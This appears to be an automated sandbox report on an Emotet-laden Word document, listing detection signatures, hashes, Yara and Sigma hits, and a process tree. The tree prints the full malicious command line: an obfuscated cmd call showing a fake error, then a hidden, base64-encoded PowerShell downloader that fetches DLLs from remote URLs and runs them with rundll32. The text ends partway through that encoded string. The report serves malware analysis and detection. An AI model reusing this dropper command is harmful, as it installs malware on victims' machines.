Loading ...

Play interactive tourEdit tour

Analysis Report INFO.doc

Overview

General Information

Sample Name:INFO.doc
Analysis ID:343450
MD5:ef80dff28ff3f00ec7abb65ac94de266
SHA1:bf77b2394d129b8c35bafff800b0cf61d508e8b8
SHA256:19eabf766e8a1eab6d6736638f9331a3ed1606b329cf336e4a564c8b0ab220f4

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many string operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2420 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2528 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACcAKwAnAGIAcwA6AC8AJwApACsAJwAvACcAKwAoACcAdwB3ACcAKwAnAHcAJwApACsAJwAuAGIAJwArACcAaQAnACsAJwBtACcAKwAnAGMAZQAnACsAJwBwACcAKwAnAHQAaQAnACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHcAJwArACcAcAAtAGEAZABtAGkAbgAvAHMASAB5ACcAKwAnADUAdAAvACcAKwAnACEAeAAgAFsAJwArACcAIAAnACsAJwBzACcAKwAnAGgAIABiADoALwAvAGEAcgBtAGEAawAnACkAKwAnAG8AbgAnACsAKAAnAGEAcgAnACsAJwBtAHMALgAnACsAJwBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACsAKAAnAHAALQBpACcAKwAnAG4AJwApACsAKAAnAGMAbAB1ACcAKwAnAGQAZQAnACsAJwBzAC8AZgB6AC8AJwArACcAIQAnACkAKwAnAHgAIAAnACsAKAAnAFsAJwArACcAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8AJwArACcALwBhAGwAJwApACsAKAAnAHUAJwArACcAZwAnACsAJwByAGEAbQBhAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC4AJwApACsAJwBtACcAKwAnAHgAJwArACcALwAnACsAJwB0AC8AJwArACgAJwAyAC8AIQB4ACcAKwAnACAAJwArACcAWwAgAHMAaAAnACkAKwAoACcAIABiACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBoAG8AJwApACsAJwBtAGUAJwArACgAJwBjAGEAcwBzAC4AYwBvACcAKwAnAG0ALwAnACsAJwB3AHAAJwApACsAKAAnAC0AYwAnACsAJwBvAG4AdAAnACkAKwAoACcAZQBuAHQAJwArACcALwBpAEYAJwArACcALwAnACkAKQAuACIAUgBlAGAAUABsAGAAQQBDAGUAIgAoACgAJwB4ACAAJwArACgAJwBbACAAcwBoACcAKwAnACAAJwApACsAJwBiACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQATwAzADMAOABfADcANwAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAHAAYABsAEkAdAAiACgAJABPADUAMwBVACAAKwAgACQASgByAG4AegBtAGsAcwAgACsAIAAkAFUAXwAyAEQAKQA7ACQAUQA5ADkAUAA9ACgAJwBGADgAJwArACcAOABTACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATQB6AHUAYwBoAGoANgAgAGkAbgAgACQAWABhAHAAMQBsAG0AYQApAHsAdAByAHkAewAoAC4AKAAnAE4AJwArACcAZQB3AC0ATwBiACcAKwAnAGoAZQBjACcAKwAnAHQAJwApACAAcwB5AFMAVABlAE0ALgBuAGUAdAAuAFcARQBCAGMAbABpAGUATgB0ACkALgAiAGQATwBXAGAATgBMAE8AYQBEAGYAYABpAGAATABFACIAKAAkAE0AegB1AGMAaABqADYALAAgACQAWABkAG4ANQB4AGgAZwApADsAJABDADUANwBCAD0AKAAnAEMAMgAnACsAJwA5AEMAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAFgAZABuADUAeABoAGcAKQAuACIAbABlAE4AYABHAGAAVABoACIAIAAtAGcAZQAgADQANwA2ADYAOQApACAAewAuACgAJwByAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABYAGQAbgA1AHgAaABnACwAKAAoACcAQQBuACcAKwAnAHkAUwB0ACcAKQArACcAcgAnACsAKAAnAGkAbgAnACsAJwBnACcAKQApAC4AIgB0AE8AUwBgAFQAcgBJAGAATgBHACIAKAApADsAJABNADMAOQBTAD0AKAAnAFEAJwArACgAJwA3ACcAKwAnADYATgAnACkAKQA7AGIAcgBlAGEAawA7ACQAWAA1ADEAWAA9ACgAJwBLADEAJwArACcANgBGACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwA0AF8ARgA9ACgAJwBWADIAJwArACcAMQBYACcAKQA= MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2280 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2500 cmdline: powershell -w hidden -enc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACcAKwAnAGIAcwA6AC8AJwApACsAJwAvACcAKwAoACcAdwB3ACcAKwAnAHcAJwApACsAJwAuAGIAJwArACcAaQAnACsAJwBtACcAKwAnAGMAZQAnACsAJwBwACcAKwAnAHQAaQAnACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHcAJwArACcAcAAtAGEAZABtAGkAbgAvAHMASAB5ACcAKwAnADUAdAAvACcAKwAnACEAeAAgAFsAJwArACcAIAAnACsAJwBzACcAKwAnAGgAIABiADoALwAvAGEAcgBtAGEAawAnACkAKwAnAG8AbgAnACsAKAAnAGEAcgAnACsAJwBtAHMALgAnACsAJwBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACsAKAAnAHAALQBpACcAKwAnAG4AJwApACsAKAAnAGMAbAB1ACcAKwAnAGQAZQAnACsAJwBzAC8AZgB6AC8AJwArACcAIQAnACkAKwAnAHgAIAAnACsAKAAnAFsAJwArACcAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8AJwArACcALwBhAGwAJwApACsAKAAnAHUAJwArACcAZwAnACsAJwByAGEAbQBhAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC4AJwApACsAJwBtACcAKwAnAHgAJwArACcALwAnACsAJwB0AC8AJwArACgAJwAyAC8AIQB4ACcAKwAnACAAJwArACcAWwAgAHMAaAAnACkAKwAoACcAIABiACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBoAG8AJwApACsAJwBtAGUAJwArACgAJwBjAGEAcwBzAC4AYwBvACcAKwAnAG0ALwAnACsAJwB3AHAAJwApACsAKAAnAC0AYwAnACsAJwBvAG4AdAAnACkAKwAoACcAZQBuAHQAJwArACcALwBpAEYAJwArACcALwAnACkAKQAuACIAUgBlAGAAUABsAGAAQQBDAGUAIgAoACgAJwB4ACAAJwArACgAJwBbACAAcwBoACcAKwAnACAAJwApACsAJwBiACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQATwAzADMAOABfADcANwAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAHAAYABsAEkAdAAiACgAJABPADUAMwBVACAAKwAgACQASgByAG4AegBtAGsAcwAgACsAIAAkAFUAXwAyAEQAKQA7ACQAUQA5ADkAUAA9ACgAJwBGADgAJwArACcAOABTACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATQB6AHUAYwBoAGoANgAgAGkAbgAgACQAWABhAHAAMQBsAG0AYQApAHsAdAByAHkAewAoAC4AKAAnAE4AJwArACcAZQB3AC0ATwBiACcAKwAnAGoAZQBjACcAKwAnAHQAJwApACAAcwB5AFMAVABlAE0ALgBuAGUAdAAuAFcARQBCAGMAbABpAGUATgB0ACkALgAiAGQATwBXAGAATgBMAE8AYQBEAGYAYABpAGAATABFACIAKAAkAE0AegB1AGMAaABqADYALAAgACQAWABkAG4ANQB4AGgAZwApADsAJABDADUANwBCAD0AKAAnAEMAMgAnACsAJwA5AEMAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAFgAZABuADUAeABoAGcAKQAuACIAbABlAE4AYABHAGAAVABoACIAIAAtAGcAZQAgADQANwA2ADYAOQApACAAewAuACgAJwByAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABYAGQAbgA1AHgAaABnACwAKAAoACcAQQBuACcAKwAnAHkAUwB0ACcAKQArACcAcgAnACsAKAAnAGkAbgAnACsAJwBnACcAKQApAC4AIgB0AE8AUwBgAFQAcgBJAGAATgBHACIAKAApADsAJABNADMAOQBTAD0AKAAnAFEAJwArACgAJwA3ACcAKwAnADYATgAnACkAKQA7AGIAcgBlAGEAawA7ACQAWAA1ADEAWAA9ACgAJwBLADEAJwArACcANgBGACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwA0AF8ARgA9ACgAJwBWADIAJwArACcAMQBYACcAKQA= MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2296 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2728 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2688 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2864 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jqqmr\igpp.bdm',vHnBlDVDvG MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2940 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jqqmr\igpp.bdm',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2113549024.0000000000190000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000009.00000002.2123339355.00000000001D0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      0000000A.00000002.2336227694.00000000001F0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000009.00000002.2123303691.00000000001B0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000007.00000002.2101787109.0000000000220000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.rundll32.exe.220000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              8.2.rundll32.exe.190000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                9.2.rundll32.exe.1d0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  8.2.rundll32.exe.10000000.3.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    8.2.rundll32.exe.1f0000.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 19 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Call by OrdinalShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2728, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1, ProcessId: 2688
                      Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
                      Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnA